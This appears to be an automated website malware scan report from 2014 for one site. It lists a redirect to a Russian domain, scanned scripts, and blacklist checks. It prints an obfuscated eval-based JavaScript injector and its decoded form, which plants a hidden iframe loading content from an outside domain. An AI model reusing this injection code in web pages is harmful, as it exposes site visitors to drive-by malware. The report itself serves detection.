Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.charliesheenhasonespeed.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.charliesheenhasonespeed.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Sep 2014 07:30:26 GMT Location: http://se-vau.ru/acu?11 Server: Apache Vary: Accept-Encoding Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.charliesheenhasonespeed.com/ | 200 OK Content-Length: 13726 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)aa=new RegExp('test','i').toString();aaa='/test/i';if(aa.indexOf(aaa)!==-1){ss='';s=String;ee='e';e=window[ee+'val'];t='y';}h=-2;n=[4.5,4.5,52.5,51,16,20,50,55.5,49.5,58.5,54.5,50.5,55,58,23,51.5,50.5,58,34.5,54,50.5,54.5,50.5,55,58,57.5,33,60.5,42,48.5,51.5,39,48.5,54.5,50.5,20,19.5,49,55.5,50,60.5,19.5,20.5,45.5,24,46.5,20.5,61.5,4.5,4.5,4.5,52.5,51,57,48.5,54.5,50.5,57,20,20.5,29.5,4.5,4.5,62.5,16,50.5,54,57.5,50.5,16,61.5,4.5,4.5,4.5,50,55.5,49.5,58.5,54.5,50.5,55,58,23,59 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://storylootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://storylootybuz.com/main.php?page=6eb5b7677d651df4');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.t <iframe src='http://storylootybuz.com/main.php?page=6eb5b7677d651df4' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.5/jquery-ui.min.js | 200 OK Content-Length: 195762 Content-Type: text/javascript | clean |
http://www.charliesheenhasonespeed.com/js/jplayer.min.js | 200 OK Content-Length: 16498 Content-Type: application/javascript | clean |
http://www.charliesheenhasonespeed.com/js/modernizr-1.7.min.js | 200 OK Content-Length: 9021 Content-Type: application/javascript | clean |
http://www.charliesheenhasonespeed.com/js/jquery.custom.js | 200 OK Content-Length: 11976 Content-Type: application/javascript | clean |
http://widgets.fbshare.me/files/fbshare.js | 200 OK Content-Length: 1566 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 100803 Content-Type: application/javascript | clean |
http://www.charliesheenhasonespeed.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 07:30:31 GMT Location: http://se-vau.ru/acu?11 Server: Apache Vary: Accept-Encoding Content-Length: 207 Content-Type: text/html; charset=iso-8859-1 | clean |
http://se-vau.ru/acu?11 | 500 Can't connect to se-vau.ru:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
http://se-vau.ru/test404page.js | 500 Can't connect to se-vau.ru:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=charliesheenhasonespeed.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://charliesheenhasonespeed.com/
Result: charliesheenhasonespeed.com is not infected or malware details are not published yet.
Result: charliesheenhasonespeed.com is not infected or malware details are not published yet.